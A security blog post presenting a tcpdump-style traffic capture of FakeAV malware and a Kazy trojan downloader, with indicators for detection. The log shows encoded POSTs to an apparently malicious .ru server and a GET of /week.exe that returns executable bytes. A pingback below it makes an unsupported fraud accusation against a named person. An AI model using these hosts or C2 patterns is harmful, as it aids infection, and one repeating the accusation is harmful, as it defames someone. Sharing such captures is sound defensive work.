Traffic Sample PCAP of FakeAV Malware and Kazy Trojan Downloader

By | June 25, 2016

Two key indicators:

FakeAV POST – POST /hrrgkkwhjdwwwww/order.php?pid=390 (attempting to setup a payment for the FakeAV with the pid linking to the current session)

Trojan Downloader function – GET /week.exe HTTP/1.1

 

 

2015-08-27 11:39:35.045855 ARP, Request who-has 192.168.56.1 tell 192.168.56.10, length 28
……..
.’*….8
……..8.
2015-08-27 11:39:35.046218 ARP, Reply 192.168.56.1 is-at 0a:00:27:00:00:00, length 46
……..
.’…..8.
.’*….8
………………
2015-08-27 11:39:35.046432 IP 192.168.56.10.59725 > 8.8.8.8.53: 60725+ A? microsoft.com. (31)
E..;6………8
…..M.5.’./.5………. microsoft.com…..
2015-08-27 11:39:35.063594 IP 8.8.8.8.53 > 192.168.56.10.59725: 60725 2/0/0 A 134.170.188.221, A 134.170.185.46 (63)
E..[Bg..1.>i……8
.5.M.G1Y.5………. microsoft.com…………..Y……………Y……
2015-08-27 11:39:35.096336 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [S], seq 759739050, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..46.@…….8
…..X.P-H…….. .r:…………..
2015-08-27 11:39:35.150435 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [S.], seq 4248410354, ack 759739051, win 8190, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0
E(.4
E@…A…….8
.P.X.9..-H………………….
2015-08-27 11:39:35.150683 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 1, win 256, length 0
E..(6.@…….8
…..X.P-H…9..P…;…
2015-08-27 11:39:35.150905 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [F.], seq 1, ack 1, win 256, length 0
E..(6.@…….8
…..X.P-H…9..P…;…
2015-08-27 11:39:35.181327 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..2…$)).a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.183294 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$…a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.205418 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [F.], seq 1, ack 2, win 511, length 0
E(.(.i@…>…….8
.P.X.9..-H..P…:………
2015-08-27 11:39:35.205529 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 2, win 256, length 0
E..(6.@…….8
…..X.P-H…9..P…;…
2015-08-27 11:39:35.291613 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..2…$)).a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.291891 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$…a……….
1Gr2hcLa6j…..
2015-08-27 11:39:37.828655 IP 192.168.56.10.52622 > 8.8.8.8.53: 9094+ A? vh86987.eurodir.ru. (36)
E..@6………8
…….5.,YG#…………vh86987.eurodir.ru…..
2015-08-27 11:39:38.066602 IP 8.8.8.8.53 > 192.168.56.10.52622: 9094 1/0/0 A 46.30.40.95 (52)
E..P….1………8
.5…<..#…………vh86987.eurodir.ru…………..W….(_
2015-08-27 11:39:35.291613 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..2…$)).a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.291891 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$…a……….
1Gr2hcLa6j…..
2015-08-27 11:39:37.828655 IP 192.168.56.10.52622 > 8.8.8.8.53: 9094+ A? vh86987.eurodir.ru. (36)
E..@6………8
…….5.,YG#…………vh86987.eurodir.ru…..
2015-08-27 11:39:38.066602 IP 8.8.8.8.53 > 192.168.56.10.52622: 9094 1/0/0 A 46.30.40.95 (52)
E..P….1………8
.5…<..#…………vh86987.eurodir.ru…………..W….(_
2015-08-27 11:39:38.969072 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [S], seq 1389821042, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..46.@…t…8
..(_.Y.PR..r…… ……………..
2015-08-27 11:39:39.090116 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [S.], seq 2866732242, ack 1389821043, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 9], length 0
E(.4..@.3..l..(_..8
.P.Y….R..s..9.O”………….
2015-08-27 11:39:39.090503 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 1, win 16425, length 0
E..(6.@…t…8
..(_.Y.PR..s….P.@)….
2015-08-27 11:39:39.092478 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1:359, ack 1, win 16425, length 358: HTTP: POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
E…6.@…sC..8
..(_.Y.PR..s….P.@)….POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 966
Cache-Control: no-cache
2015-08-27 11:39:39.092812 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 359:1325, ack 1, win 16425, length 966: HTTP
E…6.@…p…8
..(_.Y.PR…….P.@)….eimwae=88789850&gmsekqci=16FF0EB00EA6433310B324B2F7&iqym=70AFD9C6AD22E1E3A0F45B4858441F2400042818E925A56C2F84731B45B0C8633BCF8C5C32D9CFD1461B4996588285DC361C3F38D767DCD186A4F22F6A1E605011AC39E9376815EDFBC9E2358D04CA9B862F3412BD50237F4394C1360B49FDC57AD69F9B90888161EDA880C787A0B046D9564542F8612123866D348695899174B59EFF623413D96BDE9C297B0F88F081E65D539E25C2C5A72C730662927FCB9B84189B97&kueueo1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF014C25AF001C24EF01EC250F014C250F02DC24DF01CC25BF01DC241F000C249F002C255F05FC247F009C247F0&kueueo2=44F018C250F014C244F01EC25AF05FC247F009C247F0&kueueo3=72F022C272F024C260F026C271F05CC272F032C27EF021C271F021C277F033C275F022C2&kueueo4=6BF01FC256F014C24EF059C270F058C202F029C247F01EC24CF059C270F058C202F032C272F024C202F034C211F05CC213F043C210F044C202F007C211F051C262F051C211F05FC210F041C265F039C258F0&kueueo5=74F018C250F005C257F010C24EF033C24DF009C202F036C250F010C252F019C24BF012C251F051C263F015C243F001C256F014C250F0
2015-08-27 11:39:39.213414 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 359, win 31, length 0
E(.(F.@.3…..(_..8
.P.Y….R…P….y……..
2015-08-27 11:39:39.213445 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 1325, win 35, length 0
2015-08-27 11:39:39.282319 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 1:350, ack 1325, win 35, length 349: HTTP: HTTP/1.1 200 OK
E(..F.@.3..b..(_..8
.P.Y….R…P..#.1..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

a4
..lw.d./…..O…..V.POE……gUm7H.mj.%6..4e:…o.1.)….;…&S..V.X .6..y…_E.j.i.`..Z……..VHK.J.I..g..A..,.`3:?G7…[..v’..D…”.Z..f..+.5.s..V…….l1G..v.
0
2015-08-27 11:39:39.478157 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 350, win 16337, length 0
E..(6.@…t…8
..(_.Y.PR……0P.?…..
2015-08-27 11:39:44.332404 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1325:2068, ack 350, win 16337, length 743: HTTP: POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
E…6.@…q…8
..(_.Y.PR……0P.?…..POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 393
Cache-Control: no-cache

qgwm=7D30747F51F23222258A85AEAA8F38429F&ocqesgui=27258430&skcume=16290CA72D61C87DD39A110902ED31D2A44757B295E924EF5B8D42E53BE86B4170E0E3577743D0C1B86223D57598EA0166E96E7B06ADA2F14C37205259180DCB892E1B5B9B4F891A4042EB249E6F25DBC27C9D070224AB2D56E8E038FAC6FA9CE0E0C78D309452C9ABC349FCD11159B0D87E7307C29E5104B70DA601CD9C0CDE5A7881DFDEB9A8BB0F2AF4D4D51BD93B1EB30CB6C18A5780EC63223F1DF35BBFB789BFB0
2015-08-27 11:39:44.370298 IP 192.168.56.10.61985 > 8.8.8.8.53: 63530+ A? nowakdbo.bget.ru. (34)
E..>6………8
…..!.5.*.M.*………..nowakdbo.bget.ru…..
2015-08-27 11:39:44.450567 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..a…$…-……….
1Gr2hcLa6j…..
2015-08-27 11:39:44.451157 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$.b.-……….
2015-08-27 11:39:44.453354 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 2068, win 39, length 0
E(.(F.@.3…..(_..8
.P.Y…0R…P..’.g……..
2015-08-27 11:39:44.473743 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 350:628, ack 2068, win 39, length 278: HTTP: HTTP/1.1 200 OK
E(.>F.@.3…..(_..8
.P.Y…0R…P..’.i..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

5d
…….>.”……….O’….I&S*8bQP..J…Ub”….R….
.$..Kmm……V.q…L.ZL..LD.[..b.]4…..
0
2015-08-27 11:39:44.558406 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..a…$…-……….
1Gr2hcLa6j…..
2015-08-27 11:39:44.558725 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$.b.-……….
1Gr2hcLa6j…..
2015-08-27 11:39:44.611693 IP 8.8.8.8.53 > 192.168.56.10.61985: 63530 1/0/0 A 5.101.152.71 (50)
E..Nu…1.
…….8
.5.!.:>..*………..nowakdbo.bget.ru…………..W…e.G

2015-08-27 11:39:44.750140 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [P.], seq 1:261, ack 1, win 16425, length 260: HTTP: GET /week.exe HTTP/1.1
E..,7.@…,j..8
.e.G.Z.P[\.ME/..P.@)….GET /week.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: nowakdbo.bget.ru
Cache-Control: no-cache
2015-08-27 11:39:44.885681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], ack 261, win 134, length 0
E..(..@.9….e.G..8
.P.ZE/..[\.QP…5Z……..
2015-08-27 11:39:44.885691 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1:1461, ack 261, win 134, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.9….e.G..8
.P.ZE/..[\.QP….;..HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: application/octet-stream
Content-Length: 237568
Last-Modified: Thu, 27 Aug 2015 13:45:36 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: “55df1480-3a000″
Expires: Sat, 26 Sep 2015 15:39:44 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………U.I.;.I.;.I.;.I.:.Z.;…(.L.;…).O.;.RichI.;……………..PE..L…g.#P……………..P…@…….I…….`….@……………………………………………………………….ta…………………………………_……………………………………….@`..4……………………….text….I…….P……………… ..`.rdata..b….`…….`…………..@..@.data……..p…….p…………..@….rsrc………… ………………@..@…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2015-08-27 11:39:44.885699 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1461:2921, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE/..[\.QP…)…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………..
2015-08-27 11:39:44.885705 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 2921:4381, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE/.u[\.QP…$>……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………..
2015-08-27 11:39:57.937205 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 24821:26281, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE0..[\.QP…………………………………………………………………………………………………………g.#P……..!….`…`..RSDS2>..8p..-…p…….fase.pdb….,d..Fd…c..Zc..Hc…d…c…d…c…c…c…c..nc..^d…….e..zd…d…d…e…d..de…d…d…d..Ve…d..”e…e…d..Je..<e…….e…e…….e…e…e…….e…e…….f..Ff..4f…f…f…f..\f…f…f..$f…f..rf…….g..~g..6g…g…h..Dg..$g..Fh…g…g..dg..”h…h…f…g…g…g…g..Vg…h…….b……….nd..@`..Pb……….te..|`…b………..e…`…b………..e…`…b………..f…`…b………..f…`…b……….Th.. a………………….,d..Fd…c..Zc..Hc…d…c…d…c…c…c…c..nc..^d…….e..zd…d…d…e…d..de…d…d…d..Ve…d..”e…e…d..Je..<e…….e…e…….e…e…e…….e…e…….f..Ff..4f…f…f…f..\f…f…f..$f…f..rf…….g..~g..6g…g…h..Dg..$g..Fh…g…g..dg..”h…h…f…g…g…g…g..Vg…h……..CertAlgIdToOID….CertCreateContext.S.CertCreateCTLContext..&.CertDuplicateStore….CryptEnumOIDInfo….CertCloseStore..1.CertFindAttribute.J.CertGetNameStringA..b.CertSetStoreProperty….CryptMsgClose.6.CertFindChainInStore..”.CertDuplicateCRLContext…CertCreateCRLContext..W.CertOpenStore.crypt32.dll…InsertMenuW…GetWindowTextA….LoadCursorA.@.CreateDesktopA….EnumDesktopsA…LoadImageW….LoadBitmapW.S.CreateWindowExW…SendMessageA… wsprintfW…DrawTextExA…EndDialog…InsertMenuW…MessageBo
2015-08-27 11:39:57.937321 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [.], ack 26281, win 16425, length 0
E..(70@…-A..8
.e.G.Z.P[\.QE0..P.@)….
2015-08-27 11:40:01.992399 ARP, Request who-has 192.168.56.1 (0a:00:27:00:00:00) tell 192.168.56.10, length 28
……..
.’*….8

.’…..8.
2015-08-27 11:40:03.061681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 26281:27741, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE0..[\.QP…O…xA. .GetFocus..
.OemToCharA….FindWindowExA.user32.dll….GradientFill….vSetDdrawflag.msimg32.DLL…MD5Final….MD5Update. .CDLocateRng.cryptdll.dll….TraceSQLConnect…TraceSQLBindCol.odbctrac.dll..y.GetThemeSysSize.i.GetThemeFont..d.GetThemeSysBool.|.GetThemeTextMetrics.6.DrawThemeBackground…IsThemeActive.5.CloseThemeData..j.GetThemeInt.e.GetThemeColor…OpenThemeData.q.GetThemeRect….SetWindowTheme..uxtheme.dll…GetProcAddress….LoadLibraryA..4.FindFirstFileA..e.CompareStringW..].FoldStringA.e.GetStartupInfoW…GetFileSize. .GetLogicalDriveStringsA…InitializeCriticalSection…GetLocaleInfoW….ReplaceFileW….CreateDirectoryW….GetDateFormatA….HeapFree….WaitForSingleObject…GetCommandLineW…GetOEMCP….ReadFile….GetCurrentDirectoryA….TlsGetValue.kernel32.dll……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

Share Button

2 thoughts on “Traffic Sample PCAP of FakeAV Malware and Kazy Trojan Downloader

  1. Pingback: blog comment etiquette rules

  2. Pingback: Margaret Cunniffe is an Australian Fraudster based in Melbourne Victoria who is a lying drunkard who creates the facade of a rich person by drinking champagne and living the highlife.

Leave a Reply

Your email address will not be published. Required fields are marked *